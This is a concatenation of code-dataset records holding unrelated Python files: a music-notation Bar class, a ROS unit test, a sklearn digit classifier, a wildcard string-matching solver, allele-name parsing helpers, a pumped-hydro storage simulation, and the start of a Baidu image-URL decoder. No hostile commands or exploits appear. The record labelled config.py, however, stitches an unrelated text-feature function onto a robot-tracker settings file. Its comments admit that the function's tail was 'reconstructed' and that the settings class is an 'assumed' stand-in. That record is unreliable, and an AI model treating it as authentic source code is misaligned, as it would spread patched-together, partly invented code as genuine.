f'<Bar: {self.id} {self.clef} {self.key} {self.meter} {self.barline}>'\n        return to_return\n\n    ## Implements Bar iteration by returning an iterator for the bar's\n    # voices. See: Python's iter() function.\n    def __iter__(self):\n        return iter(self.voices)\n\n
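    # Example (hypothetical usage; assumes Voice(vid) creates a voice whose id is vid):\n    #   bar = Bar(0); bar.add_voice(Voice(1)); bar.add_voice(Voice(2))\n    #   [v.id for v in bar]   # -> [1, 2]\n\n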
    ## Appends a Voice to the bar's voice list and assigns\n    # itself to the voice's bar attribute.\n    # @param voice The Voice to append to the bar's voice list.\n    # The method should raise a TypeError if voice is not a Voice instance.\n    def add_voice(self, voice):\n        if isinstance(voice, Voice):\n            self.voices.append(voice)\n            voice.bar = self  # keep the back-reference promised by the docstring\n        else:\n            raise TypeError(\"voice is not a Voice instance\")\n\n    ## Returns the bar's voice identifiers in the same order\n    # that they occur in the voices list.\n    def voice_ids(self):\n        return [voice.id for voice in self.voices]\n\n    ## Returns the number of voices in the bar.\n    def num_voices(self):\n        return len(self.voices)\n\n","sub_path":"hw7/score/bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"524573294","text":"#!/usr/bin/env python3\n\nPKG = 'lg_common'\nNAME = 'test_adhoc_browser_director_bridge'\n\nimport rospy\nimport unittest\n\nfrom lg_common import ManagedAdhocBrowser\nfrom lg_msg_defs.msg import WindowGeometry, ApplicationState\n\nfrom lg_common.logger import get_logger\nlogger = get_logger('test_managed_adhoc_browser')\n\n\nclass TestManagedAdhocBrowser(unittest.TestCase):\n    def setUp(self):\n        \"\"\"\n        - instantiate ManagedAdhocBrowser\n        - run asserts on object's parameters\n        \"\"\"\n\n        self.width = 1000\n        self.height = 1001\n        self.x = 1002\n        self.y = 1003\n        self.slug = 'testing_slug'\n        self.url = 'http://justtesting.com'\n\n        self.geometry = WindowGeometry(width=self.width,\n                                       height=self.height,\n                                       x=self.x,\n                                       y=self.y)\n        self.mab = ManagedAdhocBrowser(geometry=self.geometry,\n                                       slug=self.slug,\n                                       url=self.url)\n\n        super(ManagedAdhocBrowser, self.mab).__init__(\n            geometry=self.geometry,\n            slug=self.slug,\n            url=self.url,\n            kiosk=True)\n        logger.debug(\"This is mab: %s\" % self.mab.__dict__)\n\n    def test_1_run_basic_asserts(self):\n        \"\"\"\n        Check if managed adhoc browsers parameters are set properly\n        \"\"\"\n        self.assertEqual(self.width, self.mab.geometry.width)\n        self.assertEqual(self.height, self.mab.geometry.height)\n        self.assertEqual(self.x, self.mab.geometry.x)\n        self.assertEqual(self.y, self.mab.geometry.y)\n        self.assertEqual(self.slug, self.mab.slug)\n        self.assertEqual(self.url, self.mab.url)\n        self.assertEqual(ApplicationState.STOPPED, self.mab.state)\n        self.assertTrue((self.url in self.mab.cmd))\n        self.assertTrue(('--kiosk' in self.mab.cmd))\n\n\nif __name__ == '__main__':\n    import rostest\n    rostest.rosrun(PKG, NAME, TestManagedAdhocBrowser)\n","sub_path":"lg_common/test/offline/test_managed_adhoc_browser.py","file_name":"test_managed_adhoc_browser.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"611521444","text":"import numpy as np\nimport re\n\n\ndef textFeature2Digit(feature,word2Idx):\n    \n    numList=[]\n    eventNum=len(feature.runableList)\n    \n    for index in range(eventNum):\n        textInOne=feature.runableList[index].text\n        \n        wordList=re.findall(r\"[\\\w']+|[.,!?;]\", textInOne.lower())\n        \n        oneRunArray=np.array([])\n        \n        maxVal=20 #how many word in a sentence\n        count=0\n        for word in wordList:\n            if count<maxVal: # (tail of this function reconstructed from context)\n                oneRunArray=np.append(oneRunArray,word2Idx.get(word,0))\n                count=count+1\n        while count<maxVal: # pad short sentences with zeros up to maxVal\n            oneRunArray=np.append(oneRunArray,0)\n            count=count+1\n        numList.append(oneRunArray)\n    return np.array(numList)\n\n\n# --- Tracker configuration (config.py) ---\n# The original header of this settings file was not recovered; the imports and the\n# bare \"D\" settings namespace below are a minimal stand-in, with assumed values marked.\nimport cv2 as cv\nfrom cv2 import aruco\n\nclass D:\n    pass\nD.LED_ENUM = 0\nD.ARUCCO_ENUM = 1\nD.AREA_WIDTH_REAL = 100 # assumed; only used to scale D.SIM_ERROR below\n\n#LED -> 0, Arruco marker -> 1\nD.TRACKER_TYPE = D.LED_ENUM #D.ARUCCO_ENUM # D.LED_ENUM\n\nD.THETA = 0\nD.LENGTH = 5 #mm\n\nif D.TRACKER_TYPE is D.LED_ENUM:\n    # Robot settings \n    D.ROB_CNTR = (50, 25) # x, y\n    D.HEADING = 0\n    D.DIAMETER = 10 #15#10 \n    
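# axle length: presumably the spacing between the two drive wheels (same units as DIAMETER)\n    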
D.AXLE_LEN = 7 #10 #7\n    D.WHEEL_RADIUS = 2\n    # Simulator settings\n    D.W_HEIGHT = 840#588#640\n    D.W_WIDTH = 1480#1036#1280\n    D.LED_RADIUS = 12#15#7#8 #px\n\n    D.SIDEPIXEL_ARUCO = 100#100\n\n    D.SIM_ERROR = 0.15*D.W_WIDTH/D.AREA_WIDTH_REAL\n    \nelif D.TRACKER_TYPE is D.ARUCCO_ENUM:\n    # Robot settings \n    D.ROB_CNTR = (50, 25) # x, y\n    D.HEADING = 0\n    D.DIAMETER = 20 #20#15#10 \n    D.AXLE_LEN = 14 #17#10 #7\n    D.WHEEL_RADIUS = 2\n    # Simulator settings\n    D.W_HEIGHT = 840#588#640\n    D.W_WIDTH = 1480#1036#1280\n    D.LED_RADIUS = 12#15#7#8 #px\n    D.SIDEPIXEL_ARUCO = 100#100\n    D.ARUCO_SIDE_PIXELS = 80\n\n    D.SIM_ERROR = 3\n\n#############\nD.D_MARGIN_HORIZONTAL = (150, 10) #(L,R)\nD.D_MARGIN_VERTICAL = (10, 10)\nD.FONT = cv.FONT_HERSHEY_SIMPLEX\n \nD.D_WIDTH = D.W_WIDTH - D.D_MARGIN_HORIZONTAL[0] - D.D_MARGIN_HORIZONTAL[1] #Simulation size, needed to compute the scale \nD.D_HEIGHT = D.W_HEIGHT - D.D_MARGIN_VERTICAL[0] - D.D_MARGIN_VERTICAL[1] # relative to the size of the window detected by the camera\n\n\nD.LED_THICKNES = -1#8 \nD.ROBOT_THICKNESS = 3\n\nD.AREA_POINTS = [(10,10), (-10,-10)] #field corner points; height/width margins are added\nD.AREA_THICKNESS = 4\n\n#Settings for arruco markers and enums\nD.ARUCO_DICT = aruco.DICT_ARUCO_ORIGINAL #aruco.DICT_4X4_50\nD.ROBOT_ID = 0\nD.UPPER_LEFT_ID = 1\nD.UPPER_RIGHT_ID = 2\nD.BOTTOM_RIGHT = 3\nD.BOTTOM_LEFT = 4\nD.CORNER_IDS = [D.UPPER_LEFT_ID, D.UPPER_RIGHT_ID, D.BOTTOM_RIGHT, D.BOTTOM_LEFT]\nD.MARGIN_ARUCO = 40 #30\n\n#Settings for PID controller\n#angular control\n\n\n# heading\nD.PROPORTIONAL1 = 2.0 #proportional\nD.INTEGRAL1 = 0.2 #integral\nD.DERIVATIVE1 = 0.001 #derivative\n\nD.PROPORTIONAL2 = 1.0\nD.INTEGRAL2 = 1.0\nD.DERIVATIVE2 = 0.001\n\nD.VEL = 200\n\n \n#Choose LED order: LEFT_LD = 0 refers to the LED on the side toward which the robot turns when going forward-left \nD.LEFT_LD = 0\n\nD.RIGHT_LD = 1\n\n######################## \n#D.VIDEO_PATH = 0 #1 eeye3 mch faster\n#D.VIDEO_PATH = normpath(r'C:/Users/barte/Documents/Studia VII/Image_processing/Assets/Green_Blue_Led.avi')\nD.VIDEO_PATH = 1\n\nD.NUM_FRAMES_TO_SKIP = 0\n\nD.PLAY_IN_LOOP = False\n\nD.FRAME_RATE = 0\n\nD.SHOW_PATH = False\n\nD.MARKER_PREVIEW = True\n\n######################## \nD.AUTO_LOAD_THRESHOLDS = False\n\nD.THRESHOLDS_FILE_PATH = r\"C:\\\Users\\\barte\\\Documents\\\Studia VII\\\Image_processing\\\TadroBeaconTracker\\\tadro-tracker\\\thresh.txt\"\n\nD.SAVE_POSNS = True\n######################## \nD.CAMERA_CALIBRATION_UNDISTORT = False\n\nD.CAMERA_CALIBRATION_PATH = r'C:\\\Users\\\barte\\\Documents\\\Studia VII\\\Image_processing\\\TadroBeaconTracker\\\tadro-tracker\\\2Led\\\calibration_images\\\cam_calibration_data.p'\n\nD.NUM_CALIBRATION_TO_SKIP = 0\n\n######################## \nD.ADAPTIVE_THRESHOLD = True\n\nD.HALF_SIZE = False\n\nD.THR_WIND_OFFSET = (640, 0)\n\nD.THR_WIND_SLF_OFFSET = 320\n\nD.SLD_WIND_OFFSET = (640, 150) #1280\n\nD.SLD_WIND_SLF_OFFSET = 320\n","sub_path":"TadroBeaconTracker/tadro-tracker/2Led/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"629480823","text":"from sklearn.datasets import load_digits\r\nfrom masaic import convert\r\ndigits = load_digits()\r\nimport numpy as np\r\n\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\n\r\nfig = plt.figure(figsize=(6,6)) # figure size in inches\r\nfig.subplots_adjust(left=0,right=1,bottom=0,top=1,hspace=0.05,wspace=0.05)\r\n\r\nfrom sklearn.model_selection import 
train_test_split\r\nXtrain,Xtest,ytrain,ytest = train_test_split(digits.data,digits.target,random_state=0)\r\n\r\nzero = []\r\none = []\r\ntwo = []\r\nthree = []\r\nfour = []\r\nfive = []\r\nsix = []\r\nseven = []\r\neight = []\r\nnine = []\r\n\r\nfor i in range(len(digits.data)):\r\n if digits.target[i] == 0:\r\n zero.append(digits.data[i])\r\n if digits.target[i] == 1:\r\n one.append(digits.data[i])\r\n if digits.target[i] == 2:\r\n two.append(digits.data[i])\r\n if digits.target[i] == 3:\r\n three.append(digits.data[i])\r\n if digits.target[i] == 4:\r\n four.append(digits.data[i])\r\n if digits.target[i] == 5:\r\n five.append(digits.data[i])\r\n if digits.target[i] == 6:\r\n six.append(digits.data[i])\r\n if digits.target[i] == 7:\r\n seven.append(digits.data[i])\r\n if digits.target[i] == 8:\r\n eight.append(digits.data[i])\r\n if digits.target[i] == 9:\r\n nine.append(digits.data[i])\r\n\r\nex = np.array(three[60]).reshape((8,8))\r\n\r\nex = np.array(convert(r\"C:\\Users\\Admin\\Desktop\\Python\\計程實驗\\mini_project_3\\9.png\"))\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nmodel = RandomForestClassifier(n_estimators=1000)\r\nmodel.fit(Xtrain,ytrain)\r\n\r\nprint(model.predict(ex.reshape(1,64)))\r\n\r\nplt.imshow(ex.reshape(8,8),cmap = plt.cm.binary)\r\nplt.show()","sub_path":"drawer.py","file_name":"drawer.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"627534973","text":"\"\"\"Welcome to the game show of Guess It, the place where you guess the message behind our clues and win big prizes!\n\nWe first give you a message, a string with lowercase alphabet letters, numbers, punctuation, and the $ symbol. This symbol could represent anything -- any length of characters, or absolutely nothing, so be careful!\n\nOnce we give you some possible options to choose from, we want you to guess which of those choices could be the message hidden behind those $ symbols. If you get all of them correct, you get a chance to win big!\n\nNote: The matching process should cover the entire message, not just a section of it.\n\nExample\n\nFor message = \"prizes$\" and options = [\"prizes!\", \"prizes?\", \"prizes :D\", \"prizes\", \"money!\", \"big prizes\", \"prizes suck\"], the output should be [\"prizes!\", \"prizes?\", \"prizes :D\", \"prizes\", \"prizes suck\"]\n\nhttps://i.imgur.com/dpp3Tjz.png\n\nIn the last section, you can place \"!\", \"?\", \" :D\", \"\", or \" suck\" to make it match the five options. No matter what you replace, you will never get \"money!\" or \"big prizes\" because of the prefix, which excludes those two options.\n\nInput / Output\n\n[execution time limit] 4 seconds (php)\n\n[input] string message\n\nA string that contains lowercase letters from a - z along with numbers, punctuation, and the $ symbol.\n\nGuaranteed Constraints:\n1 ≤ message.length ≤ 1000\nmessage[i] ∈ {\"a\" - \"z\", \"0\" - \"9\" \". , ! ? : $\"}\n\n[input] array.string options\n\nAn array that contains all the possible matches for message. These strings will also only contain lowercase letters from a - z, along with numbers and punctuation, but will never contain the $ symbol.\n\nGuaranteed Constraints:\n1 ≤ options.length ≤ 1000\n1 ≤ options[i].length ≤ 1000\noptions[i][j] ∈ {\"a\" - \"z\", \"0123456789\", \". , ! ? :\"}\n\n[output] array.string\n\nAn array of strings that could represent the hidden message without any conflicting characters. 
Keep the order they appear in the original array.\"\"\"\n\n#I am the author of this challenge. Here is my intended solution, which uses some backtracking and two pointers.\n\ndef guessIt(message, options):\n    results = []\n    for choice in options:\n        ## Algorithm: Use two pointers -- i and j (one for the message, one for choice)\n        # Use st and pt as places to store the location of the $ symbol\n        i = j = 0\n        st = pt = -1\n        while i < len(choice) and len(message) > j:\n            ## Case 1: Both characters are identical, and don't need to be touched\n            if choice[i] == message[j]:\n                i += 1\n                j += 1\n            ## Case 2: We find a $ symbol, so then we can store the location of the $ symbol in both strings\n            # We can use this index to backtrack from later\n            elif j < len(message) and message[j] == \"$\":\n                pt = j\n                st = i\n                j += 1\n            ## Case 3: Nothing matches, and we have already found a $ symbol.\n            # We increment both of the stored locations by 1, indicating that the character is part of the $ symbol\n            # We now go backtrack to that location\n            elif pt > -1:\n                j = pt + 1\n                i = st + 1\n                st += 1\n            # Case 4: Nothing matches, and there were no previous $ symbol\n            # We can just exit from the loop, because we know it's impossible\n            else:\n                break\n        ## Excess $ symbol counts as nothing, we can remove them\n        while j < len(message) and message[j] == \"$\":\n            j += 1\n        ## Check if we have reached the end of the string\n        if j == len(message):\n            results.append(choice)\n    return results\n\n","sub_path":"Challenges/Published-Problems/guessIt.py","file_name":"guessIt.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"24577438","text":"# xxx!/usr/bin/python3\n#\n# updated by ...: Loreto Notarantonio\n# Version ......: 23-03-2020 17.05.39\n#\n# Program to convert an ebook to text\n\n# https://pypi.org/project/epub-conversion/\ndef ePubConverter(base_path):\n    from epub_conversion import Converter\n    converter = Converter(base_path + \"/\")\n    converter.convert(\"my_succinct_text_file.gz\")\n\ndef ePubConverter_lineByline(base_path):\n    import os\n    from epub_conversion.utils import open_book, convert_epub_to_lines, convert_lines_to_text\n\n    local_tree_list = Ln.TreeList(base_path, 'eBook')\n    for relative_folder_path in local_tree_list:\n        full_folder_path = os.path.join(base_path, relative_folder_path).rstrip(os.path.sep)\n\n        files = [f for f in os.listdir(full_folder_path) if os.path.isfile(os.path.join(full_folder_path, f))]\n        folders = [f for f in os.listdir(full_folder_path) if os.path.isdir(os.path.join(full_folder_path, f))]\n\n        for file in files:\n            filename=os.path.join(full_folder_path, file)\n            book = open_book(filename)\n            lines = convert_epub_to_lines(book)\n            ltext = convert_lines_to_text(lines)\n\n\n","sub_path":"Source/eBookProcess/eBookConverter.py","file_name":"eBookConverter.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"401490185","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing 
permissions and\n# limitations under the License.\n\n\ndef strip_chars(s : str, chars_to_remove, _cache={}):\n    if s in _cache:\n        return _cache[s]\n    original = s\n    for c in chars_to_remove:\n        while s and s[0] == c:\n            s = s[1:]\n        while s and s[-1] == c:\n            s = s[:-1]\n    _cache[original] = s\n    return s\n\n\ndef strip_whitespace_and_dashes(s : str):\n    return strip_chars(s, \"- \")\n\n\ndef smart_split(seq : str, sep : str):\n    \"\"\"\n    Split string on a separator and then get rid of dashes\n    and empty strings\n    \"\"\"\n    return [strip_whitespace_and_dashes(p) for p in seq.split(sep)]\n\n\ndef split_on_all_seps(seq : str, seps=\"_:\"):\n    \"\"\"\n    Split given string on all separators specified\n\n    For example, 02_01:01 will be split into:\n        [\"02\", \"01\", \"01\"]\n    \"\"\"\n    string_parts = [seq]\n    for sep in seps:\n        new_parts = []\n        for subseq in string_parts:\n            new_parts.extend(smart_split(subseq, sep))\n        string_parts = new_parts\n    return string_parts\n\n\ndef split_digits_at_end(seq : str):\n    \"\"\"\n    Splits strings like \"A0201\" into (\"A\", \"0201\")\n    \"\"\"\n    prefix = seq\n    suffix = \"\"\n    while prefix and prefix[-1].isdigit():\n        suffix = prefix[-1] + suffix\n        prefix = prefix[:-1]\n    return prefix, suffix\n\n\ndef contains_any_letters(s : str):\n    \"\"\"\n    Returns True if any characters in the sequence are letters.\n    \"\"\"\n    for si in s:\n        if si.isalpha():\n            return True\n    return False\n\ndef contains_whitespace(s : str):\n    \"\"\"\n    Returns True if any whitespace chars in input string.\n    \"\"\"\n    return \" \" in s or \"\\t\" in s\n\ndef split_allele_fields(\n        str_after_gene,\n        allow_three_digits_in_first_field,\n        allow_three_digits_in_second_field):\n    if \":\" in str_after_gene:\n        return str_after_gene.split(\":\")\n\n    # if we don't have ':' to guide the field boundaries\n    # then split on all possible seps and try to guess\n    # which blocks of numbers are actually multiple fields.\n    parts = split_on_all_seps(str_after_gene)\n\n    parsed_fields = []\n    failed = False\n    if len(parts) == 1:\n        part = parts[0]\n        if len(part) in {2, 3}:\n            return [part]\n\n    for part in parts:\n        if failed:\n            break\n        if part.isdigit():\n            if (allow_three_digits_in_first_field and\n                    len(parsed_fields) == 0 and\n                    len(part) > 4):\n                parsed_fields.append(part[:3])\n                part = part[3:]\n            if (allow_three_digits_in_second_field and\n                    len(parsed_fields) == 1 and\n                    len(part) > 4):\n                parsed_fields.append(part[:3])\n                part = part[3:]\n\n            while part and not failed:\n                n_parsed = len(parsed_fields)\n                remaining_length = len(part)\n                if remaining_length == 1:\n                    failed = True\n                    break\n                if (allow_three_digits_in_first_field and n_parsed == 0 and\n                        (remaining_length == 3 or remaining_length > 4)):\n                    boundary_index = 3\n                elif (allow_three_digits_in_second_field and n_parsed == 1 and\n                        (remaining_length == 3 or remaining_length > 4)):\n                    boundary_index = 3\n                else:\n                    boundary_index = 2\n                parsed_fields.append(part[:boundary_index])\n                part = part[boundary_index:]\n        else:\n            parsed_fields.append(part)\n    # if failed to parse anything then back up and try to turn some of\n    # the optional arguments false\n    if not failed and len(parsed_fields) > 0:\n        return parsed_fields\n    elif allow_three_digits_in_first_field:\n        return split_allele_fields(\n            str_after_gene,\n            allow_three_digits_in_first_field=False,\n            allow_three_digits_in_second_field=allow_three_digits_in_second_field)\n    elif allow_three_digits_in_second_field:\n        return split_allele_fields(\n            str_after_gene,\n            allow_three_digits_in_first_field=False,\n            allow_three_digits_in_second_field=False)\n    return 
None\n","sub_path":"mhcgnomes/parsing_helpers.py","file_name":"parsing_helpers.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"179131588","text":"\"\"\"\nPumped Hydro Simulation\n11/6/2017\n@author: Tristan\n\"\"\"\n\n#import modules\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n#import rain data TBD \n\n\"\"\" \n############################################################################\nWHERE THIS FUNCTION FITS INTO THE LARGE PORTFOLIO MODEL\n\nAfter allocating nuclear, solar, onshore, offshore, and calculating NG_limit\nThen run PumpedHydroPlant function and pass in arguments below:\n\nPHES_Cap , the capacity of the PHES plant\nDemand is demand[k] , the total grid demand for the current hour\nRunning_Average , the the previous hour's running average\nRenew_Gen = Nuc_Demand[k] + Sol_Demand[k] + W_Demand[k] + W_Off_Demand[k] , the amount of power that can be generated this hour by nuclear and renewables\nRenew_Dispatched = Nuc_Cap*Nuc_Out[k] + Sol_Tot[k] + W_Tot[k] + W_Off_MWh[k] , the amount of power dispatched this hour by nuclear and renewables\nGrid_Demand_Left is New_D , the demand that still needs to be met for this hour after dispatching nuclear and renewables \nNG_Gen is NG_Limit , the amount of NG power that can be generted this hour\nPHES_state , the state the hydro plant was in the previous hour: 0 is standby, 1 is pumping, 2 is generating\nWater_Lvl , the height of the water in the upper reservoir\n\nWill pass out updated hydro variables in the following order\nNew_State, MW_To_Be_Gen, MW_To_Be_Pump, New_Water_Level, New_Average\n\n############################################################################\n\"\"\"\n\n#Water_Lvl keeps track of the water level in the upper reservoir in m\ndef PumpedHydroPlant(PHES_Cap, Demand, Running_Average, Renew_Gen, Renew_Dispatched, Grid_Demand_Left, NG_Gen, PHES_State, Water_Lvl):\n #PHES PLANT CHARACTERISTCS \n \n #y = 1.84*x - 2 where y is MW Output and x is flow rate gen, assuming hydraulic head at max\n if(PHES_Cap == 0.0):\n return 0.0,0.0,0.0,0.0,0.0\n else:\n Water_Flow_Rate_Gen = (PHES_Cap + 2)/1.84 #566.337 #((m^3/s) )\n Water_Flow_Rate_Pump = Water_Flow_Rate_Gen*0.76 #430.4 #((m^3/s)) \n \n #Operation Thresholds for Running Average\n Pumping_Threshold = 5 #%\n Generating_Threshold = 5 #% \n \n #Constants for Equations\n Water_Density = 1000 #kg/m^3\n Gen_Efficiency = 0.75\n G = 9.8 #gravity (m/s^2)\n \n #Water Level Boundaries\n PHES_Water_Lvl_Min = 285.9 # m\n PHES_Water_Lvl_Max = 305 # m\n #PHES_Water_Lvl_Max = PHES_Cap/(Water_Density*Water_Flow_Rate_Gen*G*Gen_Efficiency/1000000) + 50# m\n \n #Hydraulic Head\n Hydraulic_Head = Water_Lvl - 54.84\n\n #Generating Capacity\n Max_Gen = Water_Density*Water_Flow_Rate_Gen*G*Hydraulic_Head*Gen_Efficiency/1000000 #(MW)\n \n #Pumping Capacity\n Max_Pump = Water_Density*Water_Flow_Rate_Pump*G*Hydraulic_Head/1000000 #(MW)\n \n #Check if there is a surplus in renewables\n Surplus_Check = 0\n Surplus_Amount = Renew_Gen - Renew_Dispatched\n if( Surplus_Amount > 0):\n Surplus_Check = 1 #There is a surplus of renewable generation\n \n #Running Average\n alpha = 0.13\n New_Average = alpha*Demand + (1-alpha)*Running_Average #Calculate new running average\n \n #Check if pumping or generating thresholds are exceeded\n Gen_Check = 0\n Pump_Check = 0\n if((Demand/New_Average)>(1+Generating_Threshold/100)):\n Gen_Check = 1 #Generating threshold exceeded\n 
elif((Demand/New_Average)<(1-Pumping_Threshold/100)):\n Pump_Check = 1 #Pumping threshold exceeded\n \n #Check if NG will be fully dispatched\n NG_Check = 0\n if((Grid_Demand_Left - NG_Gen) > 0):\n NG_Check = 1\n \n #Initialize Outputs\n New_State = PHES_State;\n MW_To_Be_Gen = 0;\n MW_To_Be_Pump = 0;\n New_Water_Level = Water_Lvl;\n \n \n #ADD water to res storage from any rainfalland and calculate new water level \n #TBD\n \n #Check if we should generate\n if((Surplus_Check == 0) and ((Gen_Check == 1) or (NG_Check == 1))): #There is still demand left and either demand is peaking or NG doesn't satisfy remaining demand\n if(Water_Lvl > PHES_Water_Lvl_Min): #+ 1 as a buffer temporarily\n \n if(NG_Check == 1): #If NG doesn't meet grid demand\n MW_To_Be_Gen = np.minimum(Max_Gen, Grid_Demand_Left - NG_Gen) \n else :\n MW_To_Be_Gen = np.minimum(Max_Gen, Grid_Demand_Left) #Not 100% sure here\n \n time = 3600\n \n for x in range(0,3600): #Generate for 1 hour (3600 seconds)\n temp = GenOneSecond(New_Water_Level, MW_To_Be_Gen)\n if(temp == 0):\n time = x\n break\n New_Water_Level = temp\n \n MW_To_Be_Gen = time/3600 * MW_To_Be_Gen \n \n New_State = 2 #Generating\n \n return New_State, MW_To_Be_Gen, MW_To_Be_Pump, New_Water_Level, New_Average\n \n \n #Check if we should pump\n if((Surplus_Check == 1) or (Pump_Check == 1)): #Either a surplus of renewables or demand is very low\n if(Water_Lvl < PHES_Water_Lvl_Max): #- 1 as a buffer temporarily\n \n if(Surplus_Check == 1): #IF there is a renewable surplus, pump up the surplus\n MW_To_Be_Pump = np.minimum(Max_Pump, Surplus_Amount)\n \n elif(NG_Gen - Grid_Demand_Left > 0): #No renewable surplus, but NG gen is not fully used\n MW_To_Be_Pump = np.minimum(Max_Pump, NG_Gen - Grid_Demand_Left)\n \n else: #Just in case demand is very low but expensive generation is dispatched due to portfolio makeup\n New_State = 0 #Standby\n return New_State, MW_To_Be_Gen, MW_To_Be_Pump, New_Water_Level, New_Average\n \n time = 3600\n \n for x in range(0,3600): #Pump for 1 hour (3600 seconds)\n temp = PumpOneSecond(New_Water_Level, MW_To_Be_Pump)\n if(temp == 0):\n time = x\n break\n New_Water_Level = temp\n\n MW_To_Be_Pump = time/3600 * MW_To_Be_Pump \n \n New_State = 1 #Pumping\n return New_State, MW_To_Be_Gen, MW_To_Be_Pump, New_Water_Level, New_Average\n\n #All pumping and generating conditions failed\n New_State = 0 #Standby\n return New_State, MW_To_Be_Gen, MW_To_Be_Pump, New_Water_Level, New_Average\n\n\n#Equations calculated from northfield data and created using https://www.mycurvefit.com/\n#Excel is terrible at best fit equations and messed it up\n#But i did graph the new equations in excel to double check the website is correct\n\ndef PumpOneSecond(Water_Level, Energy_To_Pump):\n if(Water_Level >= 304.95):\n return 0\n \n Head = Water_Level - 54.864 #m\n Water_Density = 1000 #kg/m^3\n G = 9.8 #gravity (m/s^2)\n Volume_In_Res = getVolumeStored(Water_Level)\n \n Flow_Rate = (Energy_To_Pump*1000000)/(Water_Density*G*Head) #(m^3/s)\n\n New_Volume = Volume_In_Res + Flow_Rate\n New_Water_Level = getWaterLevel(New_Volume)\n \n return New_Water_Level\n \ndef GenOneSecond(Water_Level, Energy_To_Gen):\n if(Water_Level <= 285.9):\n return 0\n \n Head = Water_Level - 54.864 #m\n Water_Density = 1000 #kg/m^3\n Gen_Efficiency = 0.75\n G = 9.8 #gravity (m/s^2)\n Volume_In_Res = getVolumeStored(Water_Level)\n \n Flow_Rate = (Energy_To_Gen*1000000)/(Water_Density*G*Head*Gen_Efficiency) #(m^3/s)\n\n New_Volume = Volume_In_Res - Flow_Rate\n New_Water_Level = 
getWaterLevel(New_Volume)\n    \n    return New_Water_Level\n\n\n#x = (10 (sqrt(1744599 y + 5318406157000) + 47560900))/1744599\ndef getWaterLevel(Storage): #Takes in volume stored (m^3) in reservoir as an arg\n    return 10*(((1744599*Storage+5318406157000)**0.5)+ 47560900)/1744599 #Outputs water level in m\n    \n#y = 1293547000 - 9512180*x + 17445.99*x^2\ndef getVolumeStored(WaterLevel): #Takes in the water level (m) of reservoir as an arg\n    return (17445.99*((WaterLevel)*(WaterLevel)) - 9512180*(WaterLevel) + 1293547000) #Outputs volume of water stored in m^3\n\n","sub_path":"OldVersions/PHES_model11617.py","file_name":"PHES_model11617.py","file_ext":"py","file_size_in_byte":8660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"438260145","text":"#This code can only download images from baidu\r\n#\r\n\r\nimport urllib\r\nimport requests\r\nimport os\r\nimport re\r\n\r\nimport numpy as np\r\n\r\n\r\nstr_table = {\r\n    '_z2C$q': ':',\r\n    '_z&e3B': '.',\r\n    'AzdH3F': '/'\r\n}\r\n\r\nchar_table = {\r\n    'w': 'a',\r\n    'k': 'b',\r\n    'v': 'c',\r\n    '1': 'd',\r\n    'j': 'e',\r\n    'u': 'f',\r\n    '2': 'g',\r\n    'i': 'h',\r\n    't': 'i',\r\n    '3': 'j',\r\n    'h': 'k',\r\n    's': 'l',\r\n    '4': 'm',\r\n    'g': 'n',\r\n    '5': 'o',\r\n    'r': 'p',\r\n    'q': 'q',\r\n    '6': 'r',\r\n    'f': 's',\r\n    'p': 't',\r\n    '7': 'u',\r\n    'e': 'v',\r\n    'o': 'w',\r\n    '8': '1',\r\n    'd': '2',\r\n    'n': '3',\r\n    '9': '4',\r\n    'c': '5',\r\n    'm': '6',\r\n    '0': '7',\r\n    'b': '8',\r\n    'l': '9',\r\n    'a': '0'\r\n}\r\n\r\n# str's translate method needs the decimal unicode code point of a single character as the key\r\n# digits in the value would be treated as decimal unicode code points and converted to characters\r\n# a string can also be used directly as the value\r\nchar_table = {ord(key): ord(value) for key, value in char_table.items()}\r\n\r\n# Decode an image URL\r\ndef decode(url):\r\n    # first replace the multi-character tokens\r\n    for key, value in str_table.items():\r\n        url = url.replace(key, value)\r\n    # then map the remaining single characters\r\n    return url.translate(char_table)\r\n\r\n
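# Note: decode() inverts a simple substitution cipher: token strings map back to ':' '.' '/', then single characters are unscrambled via str.translate.\r\n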
